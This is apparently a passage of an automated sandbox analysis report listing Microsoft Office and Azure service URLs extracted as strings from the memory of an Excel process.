      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comM
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoreg
      Source: EXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook(
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934222214.000000000DFD0000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EXCEL.EXE, 00000000.00000003.652896727.000000000E35C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661357019.000000000E35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660061088.000000000E35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655623912.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediac
      Source: EXCEL.EXE, 00000000.00000003.661357019.000000000E35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660061088.000000000E35B000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bv
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearer
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://lifecycle.office.comMBI_SSL_SHORThttps://lifecycle.office.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://login.windows.local
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.localtes
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize#
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize$
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize%
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize(
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize)
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-N
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize0
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize2
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize3
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize4Ii
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize5
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize6
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize8
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC&
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeI
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeN
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom=YI
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorized
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizef
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehu
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeKJ
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeXJ
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizekH
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizem
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeteB
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizew
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t
      Source: EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logE
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
      Source: EXCEL.EXE, 00000000.00000003.652989909.000000000F73B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935840425.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742471357.000000000F729000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.773711564.000000000F729000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyp
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechPeA
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.742853289.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660247505.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654236313.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652925426.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934591120.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778384283.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661726514.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.852724407.000000000E1D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652824432.000000000E1DC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655830251.000000000E1DC000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.654090003.000000000E0EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656225911.000000000E0EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934378844.000000000E0EF000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules#
      Source: EXCEL.EXE, 00000000.00000003.654125752.000000000E12A000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
